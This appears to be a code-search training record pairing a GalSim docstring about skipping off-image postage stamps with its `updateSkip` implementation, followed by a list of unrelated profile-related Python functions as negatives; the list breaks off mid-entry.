Before drawing the profile, see whether this object can be trivially skipped. The base method checks whether the object is completely off the main image, in which case the intersection bounds will be undefined; if so, don't bother drawing the postage stamp for this object.

Parameters:
prof: The profile to draw.
image: The image onto which to draw the profile (may be None).
method: The method to use in drawImage.
offset: The offset to apply when drawing.
config: The configuration dict for the stamp field.
base: The base configuration dict.
logger: If given, a logger object to log progress.

Returns: whether to skip drawing this object.
def updateSkip(self, prof, image, method, offset, config, base, logger):
    # NOTE: There are currently unresolved issues with the image size checking of
    # chromatic objects, so the chromatic branch below is a conservative placeholder.
    if prof is not None and base.get('current_image', None) is not None:
        if image is None:
            prof = base['wcs'].toImage(prof, image_pos=base['image_pos'])
            if isinstance(prof, galsim.GSObject):
                N = prof.getGoodImageSize(1.)
            elif isinstance(prof, galsim.ChromaticObject):
                # TODO: Settle the chromatic case properly.  For now, find the
                # suggested image size for each component object and use the
                # maximum, just to be safe.
                obj_list = prof.original.obj_list
                possible_im_sizes = [obj.getGoodImageSize(1.) for obj in obj_list]
                N = int(np.max(possible_im_sizes))
            N += 2 + int(np.abs(offset.x) + np.abs(offset.y))
            bounds = galsim._BoundsI(1, N, 1, N)
        else:
            bounds = image.bounds

        # Set the origin appropriately
        stamp_center = base['stamp_center']
        if stamp_center:
            bounds = bounds.shift(stamp_center - bounds.center)
        else:
            bounds = bounds.shift(base.get('image_origin', galsim.PositionI(1, 1)) -
                                  galsim.PositionI(bounds.xmin, bounds.ymin))

        overlap = bounds & base['current_image'].bounds
        if not overlap.isDefined():
            logger.info('obj %d: skip drawing object because its image will be entirely off '
                        'the main image.', base['obj_num'])
            return True

    return False
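For reference, a minimal sketch of the bounds-overlap test this method relies on (assumes GalSim 2.x; the profile, image size, and positions here are illustrative only, not part of the record above):

import galsim

# The "current_image" that postage stamps get drawn onto.
main_image = galsim.ImageF(64, 64, scale=1.0)

# An illustrative profile; getGoodImageSize suggests a stamp size in pixels.
prof = galsim.Gaussian(sigma=2.0)
N = prof.getGoodImageSize(1.0)
stamp_bounds = galsim.BoundsI(1, N, 1, N)

# Center the stamp well off the main image.
stamp_bounds = stamp_bounds.shift(galsim.PositionI(500, 500) - stamp_bounds.center)

# An undefined intersection means the stamp misses the image entirely -> skip.
overlap = stamp_bounds & main_image.bounds
print(overlap.isDefined())  # False -> safe to skip drawing this object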
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def draw(self, prof, image, method, offset, config, base, logger, **kwargs):\n # ... draw prof onto the given image (making a new Image if necessary)\n if prof is None:\n return image\n else:\n logger = galsim.config.LoggerWrapper(logger)\n # Setup the kwargs to pass to drawImage\n # (Start with any additional kwargs given as extra kwargs to DrawBasic and add to it.)\n kwargs['image'] = image\n kwargs['offset'] = offset\n kwargs['method'] = method\n if 'wmult' in config and 'wmult' not in kwargs: # pragma: no cover\n kwargs['wmult'] = galsim.config.ParseValue(config, 'wmult', base, float)[0]\n if 'wcs' not in kwargs and 'scale' not in kwargs:\n kwargs['wcs'] = base['wcs'].local(image_pos = base['image_pos'])\n if method == 'phot' and 'rng' not in kwargs:\n kwargs['rng'] = galsim.config.GetRNG(config, base, logger, \"method='phot'\")\n\n # Check validity of extra phot options:\n max_extra_noise = None\n if 'n_photons' in config and 'n_photons' not in kwargs:\n if method != 'phot':\n raise AttributeError('n_photons is invalid with method != phot')\n if 'max_extra_noise' in config:\n logger.warning(\n \"Both 'max_extra_noise' and 'n_photons' are set in config dict, \"+\n \"ignoring 'max_extra_noise'.\")\n kwargs['n_photons'] = galsim.config.ParseValue(config, 'n_photons', base, int)[0]\n elif 'max_extra_noise' in config:\n max_extra_noise = galsim.config.ParseValue(config, 'max_extra_noise', base, float)[0]\n if method != 'phot' and max_extra_noise is not None:\n raise AttributeError('max_extra_noise is invalid with method != phot')\n\n if 'poisson_flux' in config and 'poisson_flux' not in kwargs:\n if method != 'phot':\n raise AttributeError('poisson_flux is invalid with method != phot')\n kwargs['poisson_flux'] = galsim.config.ParseValue(config, 'poisson_flux', base, bool)[0]\n\n if max_extra_noise is not None and 'max_extra_noise' not in kwargs:\n if max_extra_noise < 0.:\n raise ValueError(\"image.max_extra_noise cannot be negative\")\n if 'image' in base and 'noise' in base['image']:\n noise_var = galsim.config.CalculateNoiseVariance(base)\n else:\n raise AttributeError(\"Need to specify noise level when using max_extra_noise\")\n if noise_var < 0.:\n raise ValueError(\"noise_var calculated to be < 0.\")\n max_extra_noise *= noise_var\n kwargs['max_extra_noise'] = max_extra_noise\n\n if logger.isEnabledFor(logging.DEBUG):\n # Don't output the full image array. 
Use str(image) for that kwarg.\n alt_kwargs = dict([(k,str(kwargs[k]) if isinstance(kwargs[k],galsim.Image) else kwargs[k])\n for k in kwargs])\n logger.debug('obj %d: drawImage kwargs = %s',base.get('obj_num',0), alt_kwargs)\n logger.debug('obj %d: prof = %s',base.get('obj_num',0),prof)\n try:\n # NOTE: Old version:\n # image = prof.drawImage(**kwargs)\n if isinstance(prof, galsim.GSObject):\n image = prof.drawImage(**kwargs)\n elif isinstance(prof, galsim.ChromaticObject):\n bp = {}\n for key in (self._req_bp_fields+self._opt_bp_fields):\n try:\n bp[key] = config['bandpass'][key]\n except KeyError:\n bp[key] = None\n\n bandpass = galsim.Bandpass(blue_limit=bp['blue_limit'], red_limit=bp['red_limit'],\n wave_type=bp['wave_type'], throughput=bp['throughput'],\n zeropoint=bp['zeropoint'])\n\n image = prof.drawImage(bandpass=bandpass, **kwargs)\n\n except Exception as e: # pragma: no cover\n logger.debug('obj %d: prof = %r', base.get('obj_num',0), prof)\n raise\n return image", "def testDiagonalProfile(self):\n # Use Plot backend widget to submit mouse events\n widget = self.plot.getWidgetHandle()\n\n self.plot.addImage(\n numpy.arange(100 * 100).reshape(100, -1))\n\n for method in ('sum', 'mean'):\n with self.subTest(method=method):\n # 2 positions to use for mouse events\n pos1 = widget.width() * 0.4, widget.height() * 0.4\n pos2 = widget.width() * 0.6, widget.height() * 0.6\n\n # Trigger tool button for diagonal profile mode\n self.toolBar.lineAction.trigger()\n\n # draw profile line\n widget.setFocus(qt.Qt.OtherFocusReason)\n self.mouseMove(widget, pos=pos1)\n self.qWait(100)\n self.mousePress(widget, qt.Qt.LeftButton, pos=pos1)\n self.qWait(100)\n self.mouseMove(widget, pos=pos2)\n self.qWait(100)\n self.mouseRelease(widget, qt.Qt.LeftButton, pos=pos2)\n self.qWait(100)\n\n manager = self.toolBar.getProfileManager()\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n roi = manager.getCurrentRoi()\n self.assertIsNotNone(roi)\n roi.setProfileLineWidth(3)\n roi.setProfileMethod(method)\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n curveItem = roi.getProfileWindow().getCurrentPlotWidget().getAllCurves()[0]\n if method == 'sum':\n self.assertTrue(curveItem.getData()[1].max() > 10000)\n elif method == 'mean':\n self.assertTrue(curveItem.getData()[1].max() < 10000)\n\n # Remove the ROI so the profile window is also removed\n roiManager = manager.getRoiManager()\n roiManager.removeRoi(roi)\n self.qWait(100)", "def test_profiler(self):\n\n a = np.arange(16, dtype=np.float32)\n b = np.arange(16, dtype=np.float32)\n p = profiler.Profile()\n try:\n p.enable()\n dot(a, b)\n p.disable()\n stats = pstats.Stats(p).strip_dirs()\n self.assertIn(('test_profiler.py', 7, 'dot'), stats.stats)\n finally:\n # make sure the profiler is deactivated when this test is done so as not to\n # pollute any other tests\n p.disable()\n del p", "def merge_profile(prof1, prof2):\r\n new_t = []\r\n new_l = []\r\n new_sub_profile = []\r\n #merge common(same object) opt\r\n for l in set(prof1[0]).intersection(set(prof2[0])):\r\n idx1 = prof1[0].index(l)\r\n idx2 = prof2[0].index(l)\r\n new_t.append(prof1[1][idx1] +\r\n prof2[1][idx2])\r\n new_l.append(l)\r\n if hasattr(l, 'merge_profile'):\r\n assert len(prof1[6][idx1]) == len(prof2[6][idx2])\r\n new_sub_profile.append(l.merge_profile(prof1[6][idx1],\r\n prof2[6][idx2]))\r\n else:\r\n new_sub_profile.append(None)\r\n\r\n # merge not common opt\r\n from theano.compat.six import 
StringIO\r\n for l in set(prof1[0]).symmetric_difference(set(prof2[0])):\r\n #The set trick above only work for the same object optimization\r\n #It don't work for equivalent optimization.\r\n #So we try to merge equivalent optimization here.\r\n new_l_names = [o.name for o in new_l]\r\n if l.name in new_l_names:\r\n idx = new_l_names.index(l.name)\r\n io1 = StringIO()\r\n io2 = StringIO()\r\n l.print_summary(io1)\r\n new_l[idx].print_summary(io2)\r\n if io1.read() == io2.read():\r\n if l in prof1[0]:\r\n p = prof1\r\n else:\r\n p = prof2\r\n new_t[idx] += p[1][p[0].index(l)]\r\n if hasattr(l, 'merge_profile'):\r\n assert len(p[6][p[0].index(l)]) == \\\r\n len(new_sub_profile[idx])\r\n new_sub_profile[idx] = l.merge_profile(\r\n new_sub_profile[idx], p[6][p[0].index(l)])\r\n else:\r\n new_sub_profile[idx] = None\r\n continue\r\n if l in prof1[0]:\r\n p = prof1\r\n else:\r\n p = prof2\r\n new_t.append(p[1][p[0].index(l)])\r\n idx = p[0].index(l)\r\n new_l.append(l)\r\n new_sub_profile.append(p[6][idx])\r\n\r\n new_opt = SeqOptimizer(*new_l)\r\n #We need to assert based on the name as we merge also based on\r\n #the name.\r\n assert set([l.name for l in prof1[0]]).issubset(\r\n set([l.name for l in new_l]))\r\n assert set([l.name for l in prof2[0]]).issubset(\r\n set([l.name for l in new_l]))\r\n assert len(new_t) == len(new_opt) == len(new_sub_profile)\r\n return (new_opt, new_t, prof1[2] + prof2[2],\r\n prof1[3] + prof2[3],\r\n -1, -1, new_sub_profile, [])", "def test_profiler(self):\n cmdline = [\n \"starfish\",\n \"--profile\",\n \"noop\",\n ]\n if cmdline[0] == 'starfish':\n coverage_cmdline = [\n \"coverage\", \"run\",\n \"-p\",\n \"--source\", \"starfish\",\n \"-m\", \"starfish.starfish\",\n ]\n coverage_cmdline.extend(cmdline[1:])\n cmdline = coverage_cmdline\n env = os.environ.copy()\n env[PROFILER_NOOP_ENVVAR] = \"\"\n subprocess.check_call(cmdline, env=env)", "def plot_visco_profiles(pointsh5, skip=slice(None,None,1), xscale=1e3, yscale=1e-2, tscale=3.1536e7, adjustRadial=False, benchmark=[], title=None):\n\tplt.figure()\n\n\tcoords,data,number,times = pu.load_h5_visco(pointsh5)\n\n\t#x = 1e3*np.loadtxt(points,usecols=[0]) # output_points2.txt\n\t#y = np.zeros_like(x)\n\tx = coords[:,0]\n\ty = np.zeros_like(x)\n\n\t# NOTE: plot elastic solution by passing dictionary as showelastic\n\t# Plot analytic elastic solution (t=0)\n\t#print(benchmark)\n\tif len(benchmark)>=1:\n\t\tur = zeros_like(x)\n\t\tuz = np.zeros_like(x)\n\t\tfor b in benchmark:\n\t\t\turi,uzi = m.calc_mogi_dp(x,y,**params)\n\t\t\tur += uri\n\t\t\tuz += uzi\n\t\tplt.plot(x*xscale,uz*yscale,'ko',label='benchmark')\n\n\t# Convert units\n\t#ur = np.hypot(data[:,:,0], data[:,:,1]) #assume progiles are along EW profile\n\tur = data[:,:,0]\n\tuz = data[:,:,2]\n\tx = x / xscale\n\tur = ur / yscale #cm\n\tuz = uz / yscale #cm\n\ttimes = times / tscale\n\t#times = times / 8.64e4 #days\n\t#times = times / 31536000 #years\n\n\t#plots = np.arange(0,times.size,skip)\n\t#print(plots.size)\n\t#way to cycle through markers if plotting many lines\n\t#marker = itertools.cycle(['o','^','s','D']) #plot(marker=marker.next() iterates list)\n\t#way to use gradually changing colors from a colormap\n\t#color = plt.cm.jet(1.0*i/plots.size)\n\tindplots = np.arange(times.size-1)\n\tprint(indplots)\n\tindplots = indplots[skip]\n\tprint(indplots)\n\tfor i in indplots:\n\t\tline, = plt.plot(x, uz[i], color=plt.cm.jet(1.0*i/indplots[-1]), label='{:.1f}'.format(times[i]))\n\t\tplt.plot(x, ur[i], ls='dashed', color=line.get_color())\n\t#print 
uz[i]\n\t#print uz[i-1]\n\n\tif title:\n\t\tplt.title(title)\n\telse:\n\t\tplt.title(pointsh5)\n\n\tplt.axhline(color='k',linestyle='dashed')\n\tplt.xlabel('Distance [{}]'.format(get_unit(xscale)))\n\tplt.ylabel('Displacement [{}]'.format(get_unit(yscale)))\n\tplt.show()\n\tplt.legend(title='{}'.format(get_unit(tscale)))\n\tplt.grid()", "def testAlignedProfile(self):\n # Use Plot backend widget to submit mouse events\n widget = self.plot.getWidgetHandle()\n for method in ('sum', 'mean'):\n with self.subTest(method=method):\n # 2 positions to use for mouse events\n pos1 = widget.width() * 0.4, widget.height() * 0.4\n pos2 = widget.width() * 0.6, widget.height() * 0.6\n\n for action in (self.toolBar.hLineAction, self.toolBar.vLineAction):\n with self.subTest(mode=action.text()):\n # Trigger tool button for mode\n action.trigger()\n # Without image\n self.mouseMove(widget, pos=pos1)\n self.mouseClick(widget, qt.Qt.LeftButton, pos=pos1)\n\n # with image\n self.plot.addImage(\n numpy.arange(100 * 100).reshape(100, -1))\n self.mousePress(widget, qt.Qt.LeftButton, pos=pos1)\n self.mouseMove(widget, pos=pos2)\n self.mouseRelease(widget, qt.Qt.LeftButton, pos=pos2)\n\n self.mouseMove(widget)\n self.mouseClick(widget, qt.Qt.LeftButton)\n\n manager = self.toolBar.getProfileManager()\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break", "def test_remove_spawning_profile():\n center = Coordinates(1 , 1)\n radius = 10\n speed_limit = 20\n\n i = Intersection(center, radius, speed_limit)\n\n default_driver = DriverProfile(\"Default\", 8, 2, 2, 0, 30, 3, 1)\n default_vehicle = VehicleProfile(\"Default\", 5, 15, 2, 2, 1000, 65)\n default_spawn = SpawningProfile(\"Default\", default_driver, default_vehicle)\n spawn2 = SpawningProfile(\"spawn2\", default_driver, default_vehicle)\n spawn_not_in_list = SpawningProfile(\"spawn3\", default_driver, default_vehicle)\n\n i.add_spawning_profile(default_spawn)\n i.add_spawning_profile(spawn2)\n\n assert len(i.get_spawning_profile_list()) == 2\n\n i.remove_spawning_profile(spawn_not_in_list)\n\n assert len(i.get_spawning_profile_list()) == 2\n\n i.remove_spawning_profile(spawn2)\n\n assert len(i.get_spawning_profile_list()) == 1\n\n i.remove_spawning_profile(default_spawn)\n\n assert len(i.get_spawning_profile_list()) == 0\n assert not i.get_spawning_profile_list()", "def _profile(self) -> None:\n if self.use_case.profile:\n if self._profile_stats is None:\n self._profile_stats = pstats.Stats()\n if self._current_profiler is not None:\n self._current_profiler.disable()\n self._profile_stats.add(self._current_profiler)\n # TODO: use clear() instead of always creating a new profile\n self._current_profiler = cProfile.Profile()\n self._current_profiler.enable()", "def prepocessImg(self, method, size, img, bb,offset=0.3,gray=True,\n boundry=False, outputDebug=False,outputprefix=None):\n if method == 'crop':\n crop_img = crop_only(img,bb.left(),bb.top(),bb.width(),bb.height(),offset,size)\n elif method == 'affine':\n img = Image.fromarray(img)\n if self.predictor == None:\n raise Exception(\"Error: method affine should initial with an facepredictor.\")\n alignPoints = self.align(img, bb)\n (xs, ys) = zip(*alignPoints)\n (l, r, t, b) = (min(xs), max(xs), min(ys), max(ys))\n w,h = img.size\n if boundry and (l < 0 or r > w or t < 0 or b > h):\n raise AliError('face out of boundry')\n \n left_eye_l = alignPoints[36]\n left_eye_r = alignPoints[39]\n left_eye = (np.array(left_eye_l)+np.array(left_eye_r))/2\n right_eye_l = alignPoints[42]\n 
right_eye_r = alignPoints[45]\n right_eye = (np.array(right_eye_l)+np.array(right_eye_r))/2\n crop_img = crop_simi(img,left_eye,right_eye,(offset,offset),(size,size))\n im_buffer = cStringIO.StringIO()\n crop_img.save(im_buffer, format=\"JPEG\")\n im_str = base64.b64encode(im_buffer.getvalue())\n else:\n raise Exception(\"undefined crop method\")\n if gray:\n crop_img = crop_img.convert('L')\n if outputDebug:\n dirname = './aligndebug'\n if not os.path.exists(os.path.abspath(dirname)):\n os.mkdir(dirname)\n drawbox(img,(bb.left(),bb.right(),bb.top(),bb.bottom()))\n if method == 'affine':\n drawpoint(img,left_eye)\n drawpoint(img,right_eye)\n img.save('{}/{}_annotated.jpg'.format(dirname,outputprefix))\n crop_img.save('{}/{}_crop.jpg'.format(dirname,outputprefix))\n crop_img = np.array(crop_img,dtype=np.float32) #look carefully on data format\n if crop_img.ndim == 3: #data shape for caffe\n return crop_img,score\n elif crop_img.ndim == 2:\n bbox = [bb.left(),bb.top(),bb.right(),bb.bottom()]\n return crop_img[:,:,np.newaxis], bbox\n else:\n raise Exception(\"wrong dimension\")", "def test_add_spawning_profile():\n center = Coordinates(1 , 1)\n radius = 10\n speed_limit = 20\n\n i = Intersection(center, radius, speed_limit)\n\n assert not i.get_spawning_profile_list()\n\n default_driver = DriverProfile(\"Default\", 8, 2, 2, 0, 30, 3, 1)\n default_vehicle = VehicleProfile(\"Default\", 5, 15, 2, 2, 1000, 65)\n default_spawn = SpawningProfile(\"Default\", default_driver, default_vehicle)\n spawn2 = SpawningProfile(\"spawn2\", default_driver, default_vehicle)\n\n i.add_spawning_profile(default_spawn)\n\n assert i.get_spawning_profile_list()\n assert len(i.get_spawning_profile_list()) == 1\n\n i.add_spawning_profile(spawn2)\n\n assert len(i.get_spawning_profile_list()) == 2", "def test_remove_spawning_profile_from_intersection():\n tester = TestClass()\n intersections = tester.add_spawning_profile_to_intersection()\n\n for i in intersections:\n if len(i.get_spawning_profile_list()) != 0:\n assert True\n\n for spawn in i.get_spawning_profile_list():\n if spawn.get_spawning_profile_name() == 'Default':\n assert True\n break\n\n tester.delete_spawning_profile_from_intersection()\n\n for i in intersections:\n if len(i.get_spawning_profile_list()) == 0:\n assert True", "def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):\n\n try:\n __import__(\"gobject\")\n from thirdparty.gprof2dot import gprof2dot\n from thirdparty.xdot import xdot\n import gtk\n import pydot\n except ImportError as ex:\n errMsg = \"profiling requires third-party libraries ('%s') \" % getSafeExString(ex)\n errMsg += \"(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')\"\n logger.error(errMsg)\n\n return\n\n if profileOutputFile is None:\n profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.raw\")\n\n if dotOutputFile is None:\n dotOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.dot\")\n\n if imageOutputFile is None:\n imageOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.png\")\n\n if os.path.exists(profileOutputFile):\n os.remove(profileOutputFile)\n\n if os.path.exists(dotOutputFile):\n os.remove(dotOutputFile)\n\n if os.path.exists(imageOutputFile):\n os.remove(imageOutputFile)\n\n infoMsg = \"profiling the execution into file '%s'\" % profileOutputFile\n logger.info(infoMsg)\n\n # Start sqlmap main function and generate a raw profile file\n cProfile.run(\"start()\", profileOutputFile)\n\n infoMsg = 
\"converting profile data into a dot file '%s'\" % dotOutputFile\n logger.info(infoMsg)\n\n # Create dot file by using extra/gprof2dot/gprof2dot.py\n # http://code.google.com/p/jrfonseca/wiki/Gprof2Dot\n dotFilePointer = codecs.open(dotOutputFile, 'wt', UNICODE_ENCODING)\n parser = gprof2dot.PstatsParser(profileOutputFile)\n profile = parser.parse()\n profile.prune(0.5 / 100.0, 0.1 / 100.0)\n dot = gprof2dot.DotWriter(dotFilePointer)\n dot.graph(profile, gprof2dot.TEMPERATURE_COLORMAP)\n dotFilePointer.close()\n\n infoMsg = \"converting dot file into a graph image '%s'\" % imageOutputFile\n logger.info(infoMsg)\n\n # Create graph image (png) by using pydot (python-pydot)\n # http://code.google.com/p/pydot/\n pydotGraph = pydot.graph_from_dot_file(dotOutputFile)\n\n # Reference: http://stackoverflow.com/questions/38176472/graph-write-pdfiris-pdf-attributeerror-list-object-has-no-attribute-writ\n if isinstance(pydotGraph, list):\n pydotGraph = pydotGraph[0]\n\n try:\n pydotGraph.write_png(imageOutputFile)\n except OSError:\n errMsg = \"profiling requires graphviz installed \"\n errMsg += \"(Hint: 'sudo apt-get install graphviz')\"\n logger.error(errMsg)\n else:\n infoMsg = \"displaying interactive graph with xdot library\"\n logger.info(infoMsg)\n\n # Display interactive Graphviz dot file by using extra/xdot/xdot.py\n # http://code.google.com/p/jrfonseca/wiki/XDot\n win = xdot.DotWindow()\n win.connect('destroy', gtk.main_quit)\n win.set_filter(\"dot\")\n win.open_file(dotOutputFile)\n gtk.main()", "def paintAvatar(self):\n self.paintBody()\n self.paintShoes()\n if self.avatarConfiguration[\"gender\"] == \"boy\":\n self.paintShirt()\n self.paintTrousers()\n else:\n self.paintSkirt()\n self.paintHead()\n self.paintHair()\n self.paintMask()", "def __init__(self, velocity, vorticity, prof_coords, \n direction, beginMeanComput, **kwds):\n assert 'variables' not in kwds, 'variables parameter is useless.'\n super(Profiles, self).__init__(variables=[velocity, vorticity],\n **kwds)\n ## velocity field\n self.velocity = velocity\n ## vorticity field\n self.vorticity = vorticity\n ## X and Y coordinates of the profile\n self.prof_coords = prof_coords\n ## profile direction (0, 1 or 2)\n self.direction = direction\n ## time at which the computation of mean profile must begin\n self.beginMeanComput = beginMeanComput\n self.input = [velocity, vorticity]\n self.output = []", "def onSkipSegLimit(self):\r\n profprint()\r\n #research\r\n logic = self.logic\r\n logic.placeAxialLimitMarker(assign=False)", "def profile(args):\n\n if not args.first_batches_to_skip < args.max_batch_num:\n raise ValueError(\"arg 'first_batches_to_skip' must be smaller than \"\n \"'max_batch_num'.\")\n if not args.first_batches_to_skip >= 0:\n raise ValueError(\n \"arg 'first_batches_to_skip' must not be smaller than 0.\")\n\n _, avg_cost, accuracy = stacked_lstmp_model(\n frame_dim=args.frame_dim,\n hidden_dim=args.hidden_dim,\n proj_dim=args.proj_dim,\n stacked_num=args.stacked_num,\n class_num=args.class_num,\n parallel=args.parallel)\n\n optimizer = fluid.optimizer.Adam(\n learning_rate=fluid.layers.exponential_decay(\n learning_rate=args.learning_rate,\n decay_steps=1879,\n decay_rate=1 / 1.2,\n staircase=True))\n optimizer.minimize(avg_cost)\n\n place = fluid.CPUPlace() if args.device == 'CPU' else fluid.CUDAPlace(0)\n exe = fluid.Executor(place)\n exe.run(fluid.default_startup_program())\n\n ltrans = [\n trans_add_delta.TransAddDelta(2, 2),\n trans_mean_variance_norm.TransMeanVarianceNorm(args.mean_var),\n 
trans_splice.TransSplice(5, 5), trans_delay.TransDelay(5)\n ]\n\n data_reader = reader.AsyncDataReader(\n args.feature_lst, args.label_lst, -1, split_sentence_threshold=1024)\n data_reader.set_transformers(ltrans)\n\n feature_t = fluid.LoDTensor()\n label_t = fluid.LoDTensor()\n\n sorted_key = None if args.sorted_key == 'None' else args.sorted_key\n with profiler.profiler(args.device, sorted_key) as prof:\n frames_seen, start_time = 0, 0.0\n for batch_id, batch_data in enumerate(\n data_reader.batch_iterator(args.batch_size,\n args.minimum_batch_size)):\n if batch_id >= args.max_batch_num:\n break\n if args.first_batches_to_skip == batch_id:\n profiler.reset_profiler()\n start_time = time.time()\n frames_seen = 0\n # load_data\n (features, labels, lod, _) = batch_data\n features = np.reshape(features, (-1, 11, 3, args.frame_dim))\n features = np.transpose(features, (0, 2, 1, 3))\n feature_t.set(features, place)\n feature_t.set_lod([lod])\n label_t.set(labels, place)\n label_t.set_lod([lod])\n\n frames_seen += lod[-1]\n\n outs = exe.run(fluid.default_main_program(),\n feed={\"feature\": feature_t,\n \"label\": label_t},\n fetch_list=[avg_cost, accuracy]\n if args.print_train_acc else [],\n return_numpy=False)\n\n if args.print_train_acc:\n print(\"Batch %d acc: %f\" %\n (batch_id, lodtensor_to_ndarray(outs[1])[0]))\n else:\n sys.stdout.write('.')\n sys.stdout.flush()\n time_consumed = time.time() - start_time\n frames_per_sec = frames_seen / time_consumed\n print(\"\\nTime consumed: %f s, performance: %f frames/s.\" %\n (time_consumed, frames_per_sec))", "def _enable_profiling():\n import cProfile\n import atexit\n global _profiler\n _profiler = cProfile.Profile()\n _profiler.enable()\n atexit.register(_profile_atexit)", "def testProfile2D(self):\n self.plot = StackView()\n self.plot.show()\n self.qWaitForWindowExposed(self.plot)\n\n self.plot.setStack(numpy.array([[[0, 1], [2, 3]],\n [[4, 5], [6, 7]]]))\n\n toolBar = self.plot.getProfileToolbar()\n\n manager = toolBar.getProfileManager()\n roiManager = manager.getRoiManager()\n\n roi = rois.ProfileImageStackHorizontalLineROI()\n roi.setPosition(0.5)\n roi.setProfileType(\"2D\")\n roiManager.addRoi(roi)\n roiManager.setCurrentRoi(roi)\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n profileWindow = roi.getProfileWindow()\n self.assertIsInstance(roi.getProfileWindow(), qt.QMainWindow)\n self.assertIsInstance(profileWindow.getCurrentPlotWidget(), Plot2D)\n\n roi.setProfileType(\"1D\")\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n profileWindow = roi.getProfileWindow()\n self.assertIsInstance(roi.getProfileWindow(), qt.QMainWindow)\n self.assertIsInstance(profileWindow.getCurrentPlotWidget(), Plot1D)", "def __init__(\n self,\n img_path: Union[str, \"Path\"],\n profile: dict,\n crop_size: int,\n padding: int = 0,\n **kwargs\n ):\n super().__init__()\n self.img_path = img_path\n self.crop_size = crop_size\n self.padding = padding\n\n profile.update(blockxsize=crop_size, blockysize=crop_size, tiled=True, **kwargs)\n\n # Create the file and get the indices of write locations\n with rasterio.open(self.img_path, \"w\", **profile) as dst:\n self.height = dst.height\n self.width = dst.width\n self.profile = dst.profile\n\n _y0s = range(0, self.height, self.crop_size)\n _x0s = range(0, self.width, self.crop_size)\n self.y0x0 = list(itertools.product(_y0s, _x0s))", "def test_add_spawning_profile_to_intersection():\n tester = TestClass()\n intersections = 
tester.add_spawning_profile_to_intersection()\n\n attached = False\n\n for i in intersections:\n for spawn in i.get_spawning_profile_list():\n if spawn.get_spawning_profile_name() == 'Default':\n attached = True\n break\n\n assert attached", "def trace_base(opt_model, pupil, fld, wvl, apply_vignetting=True, **kwargs):\n vig_pupil = fld.apply_vignetting(pupil) if apply_vignetting else pupil\n osp = opt_model.optical_spec\n fod = opt_model['analysis_results']['parax_data'].fod\n eprad = fod.enp_radius\n aim_pt = np.array([0., 0.])\n if hasattr(fld, 'aim_pt') and fld.aim_pt is not None:\n aim_pt = fld.aim_pt\n pt1 = np.array([eprad*vig_pupil[0]+aim_pt[0], eprad*vig_pupil[1]+aim_pt[1],\n fod.obj_dist+fod.enp_dist])\n pt0 = osp.obj_coords(fld)\n dir0 = pt1 - pt0\n length = norm(dir0)\n dir0 = dir0/length\n sm = opt_model.seq_model\n # To handle virtual object distances, always propagate from \n # the object in a positive Z direction.\n if dir0[2] * sm.z_dir[0] < 0:\n dir0 = -dir0\n return rt.trace(sm, pt0, dir0, wvl, **kwargs)", "def apply_double_profile(plotDict, args=None):\n\tif not 'prof' in plotDict['tree_draw_options'] or 'profs' in plotDict['tree_draw_options']:\n\t\tif isinstance(plotDict['tree_draw_options'], basestring):\n\t\t\tplotDict['tree_draw_options'] = [plotDict['tree_draw_options']]\n\t\tplotDict['tree_draw_options'].append('prof')\n\t# Parameter List Expansion\n\t# the x vs x profile must be an exact match of y vs x\n\t# we thus must replicate all settings for their position to match\n\t# settings we need to replicate in a controlled fashion\n\tinput_root_opts = ['nicks', 'x_expressions', 'y_expressions', 'z_expressions', 'x_bins', 'y_bins', 'z_bins', 'scale_factors', 'files', 'directories', 'folders', 'weights', 'friend_trees', 'tree_draw_options']\n\t\n\tif not plotDict.get('files'):\n\t\tplotDict['files'] = get_input_files(args)[0]\n\t# make sure all n-length (non-0,1) objects have the same size\n\topt_n_length_max = max(len(plotDict.get(opt_name, ())) for opt_name in input_root_opts if not isinstance(plotDict.get(opt_name), str))\n\tassert opt_n_length_max > 0, 'Cannot expand empty plot definition'\n\tfor opt_name in input_root_opts:\n\t\tif opt_name not in plotDict or isinstance(plotDict[opt_name], str):\n\t\t\tcontinue\n\t\tassert len(plotDict[opt_name]) <= 1 or len(plotDict[opt_name]) == opt_n_length_max, \"Replication requires all input_root options to be either of 0, 1 or same max length ('%s' is %d/%d)\" % (opt_name, len(plotDict[opt_name]), opt_n_length_max)\n\t\t# TODO: dunno if checking for None is required, saw this in HP - MF@20151130\n\t\tif not plotDict[opt_name] or plotDict[opt_name][0] is None:\n\t\t\tcontinue\n\t\tif len(plotDict[opt_name]) == 1:\n\t\t\tplotDict[opt_name] = plotDict[opt_name] * opt_n_length_max\n\t\t# never modify inplace - input may be mutable and used elsewhere/recursively\n\t\tplotDict[opt_name] = plotDict[opt_name][:] * 2\n\tif not plotDict.get('nicks') or plotDict['nicks'][0] is None:\n\t\tplotDict['nicks'] = [\"nick%d\" % nick for nick in xrange(len(plotDict['y_expressions']))]\n\t# X-Y Profile matching\n\t# explicitly create new x profiles\n\tplotDict['y_expressions'] = plotDict['y_expressions'][:opt_n_length_max] + plotDict['x_expressions'][opt_n_length_max:]\n\tplotDict['nicks'] = plotDict['nicks'][opt_n_length_max:] + ['%s_x_prof' % nick for nick in plotDict['nicks'][:opt_n_length_max]]\n\t# create new y vs <x> graphs\n\tplotDict['analysis_modules'] = plotDict.get('analysis_modules', 
